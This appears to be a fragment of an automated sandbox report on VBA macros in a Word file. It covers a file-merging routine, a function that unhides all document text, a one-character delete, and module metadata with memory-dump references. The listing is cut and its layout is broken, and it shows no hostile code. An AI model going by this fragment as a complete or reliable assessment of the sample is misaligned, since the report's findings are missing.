                                                                                              15

                                                                                              YRJTYSR

                                                                                              16

                                                                                              func1

                                                                                              17

                                                                                              func2

                                                                                              19

                                                                                              Endif

                                                                                              20

                                                                                              End Sub

Non-Executed Functions

APIs / Meta Information
• ActiveDocument
• Open
• Copy
• Paste
• InsertBreak
• Close

Strings / Decrypted Strings
• "*.doc*"

| Line | Instruction | Meta Information |
|---|---|---|
| 21 | Sub MergeFiles() | |
| 22 | Dim avFiles, lr as Long | |
| 23 | Dim docAct as Document, docNow as Document | |
| 25 | With Application.FileDialog(msoFileDialogFilePicker) | |
| 26 | . InitialFileName = "*.doc*" | |
| 27 | . AllowMultiSelect = True | |
| 28 | If . Show = False Then | |
| 28 | Exit Sub | |
| 28 | Endif | |
| 29 | Set docAct = ActiveDocument | ActiveDocument |
| 30 | For lr = 1 To . SelectedItems.Count | |
| 31 | Set docNow = Documents.Open(. SelectedItems(lr)) | Open |
| 32 | docNow.Range.Copy | Copy |
| 33 | docAct.Range(docAct.Range.End - 1).Paste | Paste |
| 34 | docAct.Range(docAct.Range.End - 1).InsertBreak Type := 0 | InsertBreak |
| 35 | docNow.Close 0 | Close |
| 36 | Next lr | |
| 37 | End With | |
| 38 | End Sub | |

APIs / Meta Information
• DoEvents
• WholeStory
• DoEvents
• DoEvents

| Line | Instruction | Meta Information |
|---|---|---|
| 44 | Function func2() | |
| 45 | DoEvents | DoEvents |
| 46 | Selection.WholeStory | WholeStory |
| 48 | DoEvents | DoEvents |
| 49 | With Selection.Font | |
| 50 | . NameFarEast = False | |
| 51 | . NameAscii = False | |
| 52 | . NameOther = False | |
| 53 | . Name = False | |
| 54 | . Hidden = False | |
| 55 | End With | |
| 56 | DoEvents | DoEvents |
| 57 | End Function | |

APIs / Meta Information
• DoEvents
• Part of subcall function Delete@Module2: Execute
• Part of subcall function Delete@Module2: Item
• wdCharacter

| Line | Instruction | Meta Information |
|---|---|---|
| 39 | Function func1() | |
| 40 | DoEvents | DoEvents |
| 41 | Selection.Delete Unit := wdCharacter, Count := 1 | wdCharacter |
| 42 | End Function | |

Module: UserForm1

Declaration

| Line | Content |
|---|---|
| 1 | Attribute VB_Name = "UserForm1" |
| 2 | Attribute VB_Base = "0{95570FB4-F9A8-48A4-B0F7-392245E94ABE}{3A1B958B-2850-4504-93D8-E3B1B84B8470}" |
| 3 | Attribute VB_GlobalNameSpace = False |
| 4 | Attribute VB_Creatable = False |
| 5 | Attribute VB_PredeclaredId = True |
| 6 | Attribute VB_Exposed = False |
| 7 | Attribute VB_TemplateDerived = False |
| 8 | Attribute VB_Customizable = False |

Module: deutsche

Declaration

| Line | Content |
|---|---|
| 1 | Attribute VB_Name = "deutsche" |
| 2 | Attribute VB_Base = "0{D803FC02-390F-4713-A33E-D0302CEAECAF}{603C2BE7-F2C8-4164-952A-B28BFA79AD68}" |
| 3 | Attribute VB_GlobalNameSpace = False |
| 4 | Attribute VB_Creatable = False |
| 5 | Attribute VB_PredeclaredId = True |
| 6 | Attribute VB_Exposed = False |
| 7 | Attribute VB_TemplateDerived = False |
| 8 | Attribute VB_Customizable = False |

Non-Executed Functions

| Line | Instruction | Meta Information |
|---|---|---|
| 11 | Private Sub UserForm_Click() | |
| 13 | End Sub | |


                                                                                                Executed Functions

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.492117077.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false

                                                                                                Non-executed Functions

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.492117077.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false